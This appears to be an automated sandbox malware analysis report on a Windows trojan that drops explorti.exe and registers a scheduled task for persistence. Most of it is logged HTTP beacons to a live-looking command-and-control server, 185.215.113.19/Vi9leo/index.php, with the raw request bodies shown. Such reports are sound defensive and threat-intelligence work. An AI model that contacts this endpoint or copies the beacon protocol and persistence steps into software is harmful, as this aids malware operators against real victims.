Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 185.215.113.19 185.215.113.19

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL

Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Code function: 7_2_0071BD60 InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile,

7_2_0071BD60

Source: unknown

HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s

Source: explorti.exe, 00000007.00000002.2891529475.00000000011BB000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000007.00000002.2891529475.00000000011FA000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000007.00000002.2891529475.000000000122A000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000007.00000002.2891529475.0000000001238000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.php
Source: explorti.exe, 00000007.00000002.2891529475.000000000122A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.php#
Source: explorti.exe, 00000007.00000002.2891529475.00000000011BB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.php#f
Source: explorti.exe, 00000007.00000002.2891529475.00000000011BB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.php0x
Source: explorti.exe, 00000007.00000002.2891529475.00000000011FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.php3M
Source: explorti.exe, 00000007.00000002.2891529475.00000000011BB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpC:
Source: explorti.exe, 00000007.00000002.2891529475.00000000011BB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpPy;
Source: explorti.exe, 00000007.00000002.2891529475.00000000011BB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpWindows
Source: explorti.exe, 00000007.00000002.2891529475.00000000011BB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpeb8a7
Source: explorti.exe, 00000007.00000002.2891529475.000000000122A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpk
Source: explorti.exe, 00000007.00000002.2891529475.00000000011BB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpm32
Source: explorti.exe, 00000007.00000002.2891529475.00000000011FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpmM
Source: explorti.exe, 00000007.00000002.2891529475.00000000011BB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpoft
Source: explorti.exe, 00000007.00000002.2891529475.00000000011BB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpon
Source: explorti.exe, 00000007.00000002.2891529475.00000000011FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpuM
Source: explorti.exe, 00000007.00000002.2891529475.00000000011BB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpx
Source: explorti.exe, 00000007.00000002.2891529475.00000000011FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpyM

System Summary

PE file contains section with special chars

Source: f3wrBtIYXx.exe	Static PE information: section name:
Source: f3wrBtIYXx.exe	Static PE information: section name: .idata
Source: f3wrBtIYXx.exe	Static PE information: section name:
Source: explorti.exe.0.dr	Static PE information: section name:
Source: explorti.exe.0.dr	Static PE information: section name: .idata
Source: explorti.exe.0.dr	Static PE information: section name:

Creates files inside the system directory

Source: C:\Users\user\Desktop\f3wrBtIYXx.exe

File created: C:\Windows\Tasks\explorti.job

Detected potential crypto function

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 7_2_00753068	7_2_00753068
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 7_2_0071E440	7_2_0071E440
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 7_2_00714CF0	7_2_00714CF0
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 7_2_00747D83	7_2_00747D83
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 7_2_0075765B	7_2_0075765B
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 7_2_00714AF0	7_2_00714AF0
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 7_2_0075777B	7_2_0075777B
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 7_2_00758720	7_2_00758720
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 7_2_00756F09	7_2_00756F09
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 7_2_00752BD0	7_2_00752BD0

Source: f3wrBtIYXx.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: f3wrBtIYXx.exe	Static PE information: Section: ZLIB complexity 1.0
Source: f3wrBtIYXx.exe	Static PE information: Section: bzkmssua ZLIB complexity 0.9941347082323538
Source: explorti.exe.0.dr	Static PE information: Section: ZLIB complexity 1.0
Source: explorti.exe.0.dr	Static PE information: Section: bzkmssua ZLIB complexity 0.9941347082323538

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@5/3@0/1

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d

Source: C:\Users\user\Desktop\f3wrBtIYXx.exe

File created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7

Source: C:\Users\user\Desktop\f3wrBtIYXx.exe

File read: C:\Users\desktop.ini

Source: C:\Users\user\Desktop\f3wrBtIYXx.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: f3wrBtIYXx.exe

Virustotal: Detection: 54%

Source: f3wrBtIYXx.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorti.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorti.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorti.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\f3wrBtIYXx.exe

File read: C:\Users\user\Desktop\f3wrBtIYXx.exe

Source: unknown	Process created: C:\Users\user\Desktop\f3wrBtIYXx.exe "C:\Users\user\Desktop\f3wrBtIYXx.exe"
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe "C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe "C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"	Jump to behavior

Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Section loaded: apphelp.dll	Jump to behavior
